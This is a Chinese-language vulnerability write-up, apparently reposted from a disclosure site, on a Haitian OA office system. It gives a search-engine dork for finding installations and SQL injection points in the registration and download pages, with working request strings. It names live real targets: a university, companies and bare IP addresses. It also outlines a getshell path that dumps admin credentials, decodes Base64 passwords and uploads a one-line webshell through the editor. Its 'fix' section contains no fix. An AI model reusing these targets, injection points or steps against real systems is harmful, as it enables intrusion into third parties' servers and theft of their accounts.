前人漏洞: 某OA系统SQL注射+后台getshell http://www.2cto.com/Article/201409/334415.html 厂商:北京联杰海天科技有限公司 官网:http://www.haitiansoft.com/ 产品:OA协同办公系统 搜索引擎语法:intitle:系统登录 系统检测到您没有安装OA客户端控件 【第1处SQL注射示例】 实例1. http://oa.tjfsu.edu.cn/NewRegisterDo.asp (注册处) Post:AddOrEdit=88952634&TureName=88952634&UserPassWord=88952634&PassWord=88952634&DepartMentDis=88952634&DepartMentID=88952634&UserName=88952634 UserName参数存在注入
实例2. http://oa.tjfsu.edu.cn/NewRegisterDo.asp Post:AddOrEdit=88952634&TureName=88952634&UserPassWord=88952634&PassWord=88952634&DepartMentDis=88952634&DepartMentID=88952634&UserName=88952634
实例3. http://www.cnshuiyu.com/login.asp Post:AddOrEdit=88952634&TureName=88952634&UserPassWord=88952634&PassWord=88952634&DepartMentDis=88952634&DepartMentID=88952634&UserName=88952634
【第2处SQL注射示例】 实例1. http://oa.ccib.com.cn/Public/OA_Download.asp?FieldName=Filename&FileContentField=FileContent&Table=Usr_Init&OAID=UsrID&Value=1 Value参数存在注入 实例2. http://211.68.208.53/Public/OA_Download.asp?FieldName=Filename&FileContentField=FileContent&Table=Usr_Init&OAID=UsrID&Value=1 实例3. http://180.166.7.94/Public/OA_Download.asp?FieldName=Filename&FileContentField=FileContent&Table=Usr_Init&OAID=UsrID&Value=1 实例4. oa.tjfsu.edu.cn/Public/OA_Download.asp?FieldName=Filename&FileContentField=FileContent&Table=Usr_Init&OAID=UsrID&Value=1
修复方案:GetShell可参考蓝猫所述: WooYun: 某OA系统SQL注射+后台getshell 以oa.tjfsu.edu.cn 天津外国语大学为例: 利用注入点跑出管理员帐号密码,密码有的是BASE64加密,可解
登录后点击"资讯内容维护"-"修改" 在编辑器中点击添加图片按钮,上传一句话。 接下来的懒猫证明过了,到这里Shell我就不传了~撤 |
-
上一篇: U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成
下一篇: 某通用型企业建站系统2处 sql注入 - 网站安全 -
还没有人抢沙发呢~